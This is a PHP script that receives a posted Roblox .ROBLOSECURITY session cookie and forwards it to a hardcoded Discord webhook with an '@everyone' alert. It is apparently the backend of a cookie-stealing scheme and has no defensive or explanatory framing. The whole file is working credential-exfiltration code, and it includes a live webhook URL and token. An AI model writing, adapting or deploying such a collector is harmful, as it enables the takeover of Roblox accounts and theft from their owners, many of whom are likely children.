<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $cookie = $_POST['cookie'] ?? '';
    $webhookURL = 'https://discord.com/api/webhooks/1274231750897438763/eLtKsEsOsyK6WNpFk97PVEb5pPIRmFq4obBDcZH579WFccrRsxPrEByzr0fkUpjEwgBM';

    $data = [
        'content' => '@everyone .ROBLOSECURITY cookie found: ' . $cookie
    ];

    $options = [
        'http' => [
            'header'  => "Content-Type: application/json\r\n",
            'method'  => 'POST',
            'content' => json_encode($data),
        ],
    ];

    $context  = stream_context_create($options);
    $result = file_get_contents($webhookURL, false, $context);

    if ($result === FALSE) {
        http_response_code(500);
        echo 'Failed to send cookie.';
    } else {
        echo 'Cookie sent successfully.';
    }
} else {
    http_response_code(405);
    echo 'Method not allowed.';
}
?>
